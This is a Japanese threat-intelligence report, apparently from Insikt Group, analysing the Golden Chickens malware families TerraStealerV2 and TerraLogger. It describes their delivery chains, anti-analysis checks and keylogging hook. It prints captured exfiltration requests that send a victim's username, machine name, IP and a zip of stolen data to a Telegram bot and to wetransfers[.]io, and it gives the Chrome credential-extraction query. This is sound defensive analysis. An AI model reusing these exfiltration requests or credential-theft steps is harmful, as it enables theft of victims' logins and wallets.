TerraStealerV2とTerraLogger：Golden Chickensの新しいマルウェアファミリーを発見

Executive Summary

Insikt Groupは、金銭目的の脅威アクターであるGolden Chickens（別名Venom Spider）に関連する2つの新しいマルウェアファミリー、TerraStealerV2とTerraLoggerを特定しました。Golden Chickensは、FIN 6、Cobalt Group、Evilnumなどのサイバー犯罪グループが使用するMalware-as-a-Service（MaaS）プラットフォームを運営することで知られています。2025年1月～4月に観測された新しいファミリーは、認証情報の窃盗とキーロギングを目的とした開発が進行中であることを示唆しています。

TerraStealerV2は、ブラウザの認証情報、暗号通貨ウォレットデータ、ブラウザ拡張機能の情報を収集するように設計されています。このマルウェアは、認証情報を盗むためにChromeの「ログインデータ」データベースを標的としていますが、2024年7月以降のChromeのアップデートで導入されたアプリケーション境界暗号化（ABE）保護を回避できないため、マルウェアのコードが古くなっているか、まだ開発中であることを示しています。データはTelegramとドメインwetransfers[.]ioの両方に流出しています。この情報窃取型マルウェアは、LNK、MSI、DLL、EXEファイルなど、複数の形式で配布されていることが確認されており、検知を回避するためにregsvr32.exeやmshta.exeなどの信頼できるWindowsユーティリティを活用しています。

対照的に、TerraLoggerはスタンドアロンのキーロガーです。一般的な低レベルのキーボードフックを使用してキーストロークを記録し、ログをローカルファイルに書き込みます。しかし、データ抽出やコマンド・アンド・コントロール（C2）通信の機能は含まれていません。これは、開発の初期段階にあるか、Golden Chickens MaaSエコシステムのモジュール式の一部として意図されていることを示しています。

TerraStealerV2とTerraLoggerの現状からは、両方のツールが依然として活発に開発されており、成熟したGolden Chickensツールに通常見られるステルス性のレベルをまだ示していないことを示唆しています。Golden Chickensはこれまで認証情報の窃取やアクセス操作を目的としたマルウェアを開発してきた歴史があるため、これらの機能は今後も進化し続けるでしょう。組織は、これらのマルウェアファミリーが成熟するにつれて侵害のリスクを軽減するために、このレポートで提供される緩和ガイダンスに従うことをお勧めします。

主な調査結果

• Insikt Groupは、脅威アクターGolden Chickensに起因する2つの新しいマルウェアファミリー、TerraStealerV2とTerraLoggerを特定しました。TerraStealerV2はブラウザの認証情報を盗み、暗号通貨ウォレットを標的にすることができますが、TerraLoggerは単独のキーロガーモジュールとしてのみ機能します。
• TerraLogger は、Golden Chickens が開発したマルウェアにおいて、キーロギング機能が初めて確認された事例です。
• TerraStealerV2はChrome ABEで保護された認証情報の復号化をサポートしていないため、このツールは古くなっているか、まだ開発中である可能性があります。
• Insikt Groupは、2025年1月～3月の間に、MSI、DLL、LNKファイルなどのさまざまな配信方法を採用した10個の異なるTerraStealerV2配布サンプルを観察しました。

背景

Golden Chickensは、Venom Spiderという別名で追跡されており、MaaSモデルの下でステルスかつモジュール式のマルウェアスイートを運用することで知られる、金銭的な動機を持つサイバー脅威アクターです。少なくとも2018年以降、Golden ChickensのMaaSスイートは、ソーシャルエンジニアリングの手法を通じて高価値の組織を標的とするキャンペーン、特に偽の求人情報や履歴書を利用したスピアフィッシングキャンペーンに展開されています。特に、このマルウェアは、ロシアを拠点とするFIN6やCobalt Group、ベラルーシを拠点とするEvilnumなどの一流のサイバー犯罪グループによって使用されており、後者に関しては世界中で15億ドル以上の損害が発生しています。

Golden ChickensのMaaSスイートのコアコンポーネントは、VenomLNKとTerraLoaderです。初期感染は通常、悪意のあるWindowsショートカットファイルであるVenomLNKを介して行われ、これにより、追加のGolden Chickensマルウェアのデプロイを担当するローダーモジュールであるTerraLoaderが実行されます。これらのモジュールには、認証情報収集用のTerraStealer、TeamViewerハイジャック用のTerraTV、ランサムウェア展開用のTerraCryptが含まれます。Golden Chickensエコシステムに起因する追加のマルウェアファミリーには、偵察用のTerraRecon、データ消去用のTerraWiper、lite_more_eggsが含まれています。これらは下の図1に示されています。

図1：以前に報告されたGolden Chickensマルウェアファミリー（出典：Quo Intelligence）

eSentireの脅威対応ユニットによるアトリビューションの取り組みにより、Golden Chickensは、モルドバとカナダのモントリオールの個人が共同で運営していると考えられているペルソナであるbadbullzvenomとして知られる脅威アクターと関連付けられています。この脅威アクターの開発履歴は、低レベルのフォーラム参加者から確立されたMaaSプロバイダーへの進化を示しています。Golden Chickensが開発したツールは、British Airways、Newegg、Ticketmaster UKに対する注目を集めた攻撃など、いくつかのキャンペーンで武器化されています。

2024年8月から10月にかけて、Zscaler ThreatLabzは、新たに特定された2つのマルウェアファミリー（RevC2とVenom Loader）の展開を含む、Golden Chickensに起因する新たな活動を確認しました 。これらのツールは、VenomLNKキャンペーンを通じて、暗号通貨の支払要求やソフトウェアAPIドキュメントといったソーシャルエンジニアリングの手口を利用して配信されました。図2は、RevC2の配信に使用された攻撃チェーンを示しています。

図2：最近のGolden Chickens攻撃チェーンによるRevC2の配信（出典：ZScaler）

初期の配信ベクトルは不明ですが、感染シーケンスはVenomLNKファイルの実行から始まります。このファイルは、ルアーのテーマ（この場合、ソフトウェアAPIドキュメント）に一致するおとり画像をダウンロードし、RevC2の実行を開始します。具体的には、このLNKファイルはwmic.exeを利用してregsvr32.exeを呼び出し、リモートネットワーク共有にホストされている悪意のあるOCXペイロードを読み込みます。

技術的分析

Insikt Groupは、脅威アクターグループGolden Chickensに起因する2つの新しいマルウェアファミリーを特定しました。1つ目は、TerraStealerV2として追跡されており、主にブラウザの認証情報、暗号通貨ウォレット、ブラウザ拡張機能をターゲットとする情報窃取型マルウェアです。2つ目は、TerraLoggerとして追跡され、スタンドアロンモジュールとして観察されるキーロガーです。次のサブセクションでは、各マルウェアファミリーの詳細な技術分析を提供します。

TerraStealerV2

Insikt Groupは最近、Golden Chickensに起因する新たな情報窃取型マルウェアを特定し、2025年3月3日にRecorded Future Malware Intelligenceにアップロードしました。サンプルに埋め込まれたプログラムデータベース（PDB）パス（図3を参照）は、この脅威アクターがこのマルウェアをNOKと称していることを示唆していますが、Insikt GroupはこれをTerraStealerV2として追跡しています。

この情報窃取型マルウェアはOCXファイルとして配信され、regsvr32.exe（DllRegisterServer エクスポート関数を呼び出す）を介して実行されることを目的としています。実行時に、DllRegisterServerはまず、指定されたファイルの拡張子が.ocxであること、およびファイル名が特定のハードコーディングされた文字または数字（0.ocxなど）で終わっていることを確認します。次に、ファイルがregsvr32.exeによって実行されていることを確認してから、以下の図4に示すように処理を進めます。

図4：TerraStealerV2のアンチ解析チェックを示すフローチャート（出典：Recorded Future）

その後、マルウェアはハードコードされたキーを用いたXORデコードルーチンで文字列の難読化を解除します。GetUserNameAとGetComputerNameAを呼び出して、ローカルユーザー名とシステム名を取得し、基本的なホスト情報を収集します。その後、ifconfig[.]meにHTTPリクエストを送信して、被害者のIPアドレスを特定します。収集されたデータはその後、図5に示すように、「NoterdanssBot」に関連付けられたボットトークンを使用して、Telegramメッセージングプラットフォームを介して「Noterdam」という名前のチャネルに流出します。

POST /< redacted >/sendMessage?chat_id=-4652754121 HTTP/1.1
Host: api.telegram.org
Accept: */*
Content-Length: 24014
Content-Type: application/x-www-form-urlencoded

chat_id=-4652754121&text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%2A%2AIP%20Address%3A%2A%2A%20%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-style-type%22%20content%3D%22text%2Fcss%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-script-type%22%20content%3D%22text%2Fjavascript%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-language%22%20content%3D%22en%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22pragma%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22cache-control%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22Get%20my%20IP%20Address%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22keywords%22%20content%3D%22ip%20address%20ifconfig%20ifconfig.me%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22favicon.ico%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22canonical%22%20href%3D%22https%3A%2F%2Fifconfig.me%2F%22%20%2F%3E%0A%20%20%20%20%3Ctitle%3EWhat%20Is%20My%20IP%20Address%3F%20-%20ifconfig.me%3C%2Ftitle%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20href%3D%22.%2Fstatic%2Fstyles%2Fstyle.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffa
      

このメッセージのPOSTデータをURLデコードすると、この脅威アクターがTelegramチャンネルに構造化された通知を送信していることが判明します。図6に示される通知には、新しいユーザーがアプリケーションを実行したことを示すアラート、収集されたユーザー名とシステム名、ifconfig[.]meリクエストからの生のHTMLレスポンスが含まれています。

**New User Ran the Application**
**Username:** Admin
**PC Name:** UUHJKMQK
**IP Address:** <!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="content-style-type" content="text/css" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-language" content="en" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta name="description" content="Get my IP Address" />
      

その後、マルウェアはアクティブなプロセスを列挙し、chrome.exeのインスタンスを探します。検出された場合、TerminateProcess Windows API を使用してプロセスを終了しようとします。この動作は、Chromeのブラウザデータベースファイルのファイルロックを解除し、データ抽出時のアクセスを妨げないようにするために意図されている可能性があります。これに続いて、マルウェアはChromeから保存された認証情報やその他の機密データを抽出しようとし、特定の暗号通貨ウォレットやブラウザ拡張機能を標的にします。

Chromeブラウザのデータベース窃盗の実装では、「Login Data」データベースをC:ProgramData\Temp\LoginDataにコピーし、静的にリンクされたSQLiteライブラリを使用して保存されたログインを抽出し、SQLクエリSELECT origin_url、username_value、password_value FROM loginsを実行します。TerraStealerV2はSQLiteバージョン3.46.0を使用しています。これはRevC2で静的にリンクされているバージョンと同じであり、コードの再利用や開発手法の共有を示唆しています。しかし、この実装はChromeのABEをバイパスしないため、2024年7月24日以降に更新されたChromeベースのブラウザを使用しているホストでは、収集されたパスワードは復号化されません。この制限は、この情報窃取型マルウェアのコードが古くなっているか、まだ開発中であることを示唆しています。効果的な情報窃取型マルウェアは通常、ABEバイパス技術を取り入れて、最新バージョンのChromeまたはMicrosoft Edgeから復号化された認証情報を抽出します。

盗み出されたブラウザのログインデータと情報メッセージは、盗用操作が完了すると、C:\ProgramData\file.txtに書き込まれ、%LOCALAPPDATA%\Packages\Bay0NsQIzx\p.txtにコピーされます。見つかった場合、対象となるブラウザ拡張機能とウォレットのディレクトリは%LOCALAPPDATA%\Packages\Bay0NsQIzxにコピーされ、見つかった暗号ウォレットの数を示すTelegramメッセージが送信されます。%LOCALAPPDATA%\Packages\Bay0NsQIzxの内容はその後、同じディレクトリにあるoutput.zipという名前のアーカイブに圧縮されます。このアーカイブはその後、Telegramボットとwetransfers[.]io/uplo.phpにホストされているセカンダリC2エンドポイントに流出されます（図7参照）。ドメインwetransfers[.]ioは2025年2月18日にNameCheap, Inc.を通じて登録され、現在はCloudflareインフラストラクチャの背後でホストされています。

POST /uplo.php HTTP/1.1
Host: wetransfers.io
Accept: */*
Content-Length: 11252
Content-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl

--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="zipFile"; filename="output.zip"
Content-Type: application/octet-stream

PK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers  2
PK..?.......3.dZ...')...).....................p.txtPK..........3...L.....
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="pcname"

UUHJKMQK
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="username"

Admin
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="totalwallets"

0
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="ip"

<!DOCTYPE html>
<html lang="en">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="content-style-type" content="text/css" />
   <meta http-equiv="content-script-type" content="text/javascript" />
   <meta http-equiv="content-language" content="en" />
   <meta http-equiv="pragma" content="no-cache" />
   <meta http-equiv="cache-control" content="no-cache" />
   <meta name="description" content="Get my IP Address" />
   <meta name="keywords" content="ip address ifconfig ifconfig.me" />

配布

Insikt Groupは、実行可能ファイル（EXE）、ダイナミックリンクライブラリ（DLL）、Windowsインストーラーパッケージ（MSI）、ショートカット（LNK）ファイルなど、TerraStealerV2の配布に使用されている複数の配信メカニズムを特定しました。観測されたすべてのケースにおいて、TerraStealerV2 OCXペイロードはURL wetransfers[.]io/v.phpから取得されました。これは同じドメインでホストされているリソースで、curlまたはPowerShellを使用したデータ流出に利用され、regsvr32.exeを介して実行されます（図8参照）。

図8：TerraStealerV2配布サンプルの攻撃チェーン（出典：Recorded Future）

表1は、ファイル名、コンパイルタイムスタンプ、およびGolden Chickensが展開していることが確認されている対応するTerraStealerV2ペイロードを含む配布サンプルを示しています。1つのLNKファイル（SHA-256：9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a）が、ClickFixとして追跡されているアクティビティクラスターと重複しているように見えます。この場合、LNKファイルはMP4ファイルを装ったペイロードをドロップし、mshta.exeを介して実行されました。これは、ClickFixキャンペーンで以前に観察された手口と一致する技術です。

表1：TerraStealerV2の配布に使用されたサンプル（出典：Recorded Future）

TerraLogger

Insikt Groupは、Golden Chickensに関連する新しいキーロガーを特定しました。このキーロガーは、2025年1月13日にRecorded Future Malware Intelligenceにアップロードされました。Insikt GroupはこのファミリーをTerraLoggerとして追跡し、5つの異なるサンプルを特定しました。4つのサンプルは意図したとおりに動作し、下の図9に示すように同じPDB文字列を含んでいます。残りのサンプルはこのPDB文字列を含まず、代わりにTerraStealerV2と同じPDBパスを使用しています（上記図3参照）。この外れ値は、TerraStealerV2と同じ文字列エンコード方法を使用した開発者テストのようです。ただし、キーロガー関連の文字列を初期化する際のクラッシュにより実行中に失敗し、マルウェアはプライマリエントリポイントに到達できていません。

C:\Users\PC\Downloads\Projector\Projector\x64\Release\Projector.pdb

TerraLoggerは通常、OCXファイルとして配信され、TerraStealerV2と同じ初期実行チェックを採用しています。これはregsvr32.exeを通じて実行されることを意図しており、DllRegisterServerエクスポート関数を呼び出します。実行時に、まず提供されたファイルの拡張子が.ocxであり、ファイル名がハードコードされた文字または数字（例：0.ocx）で終わっていることを確認します。次に進む前にファイルがregsvr32.exeによって実行されていることを確認します。初期実行チェックに合格した場合、TerraLoggerはキーストロークを記録するためのファイルハンドルを開きます。

Insikt Groupは、特定された5つのサンプル全体で複数のファイルパスを特定し、ログはa.txt、f.txt、op.txt、またはsave.txtのようなファイルに書き込まれ、C:\ProgramDataフォルダに保存されました。このマルウェアは一般的に見られる手法を使用してキーロガーを実装します。WH_KEYBOARD_LLフックをSetWindowsHookExAを使用してインストールし、メッセージイベントを傍受および処理するためにfnコールバック関数（図10参照）を登録し、キーボードアクティビティをキャプチャできるようにします。

図10：キーロガーのコールバック関数（出典：Recorded Future）

キーストロークはmw_log_key関数内の開いているログファイルに書き込まれます。この関数は、まず現在のフォアグラウンドウィンドウのタイトルを取得し、次に改行記号を追加し、その後に傍受されたキーストロークを追加します。セミコロン、括弧、引用符などの特殊文字を処理するロジックが含まれており、Shiftキーの状態を確認して、記録する正しい文字を決定します。キーコードが既知の特殊キーと一致しない場合は、<KEY-[keycode]>形式で記述されます。結果のログファイルの例を図11に示します。

図11：キーロガーのログファイル例（出典：Recorded Future）

表2は、特定された5つのTerraLoggerキーロガーサンプルとバージョン間の違いをまとめたものです。コンパイルのタイムスタンプは、最初のバージョンが2025年1月13日にビルドされ、最新のサンプルが2025年4月1日にコンパイルされたことを示しています。これらのサンプルは、軽微な増分更新を反映しており、活発な開発を示唆しています。注目すべき変更点には、キーストロークログを保存するためのファイルパスの変更と、特殊キーの表記方法の変更が含まれます。特殊キーの表記は、山括弧で囲まれた大文字のトークン（例：、）から、パイプで区切られた小文字の略語（例：|bck|、|sft|）に変更されました。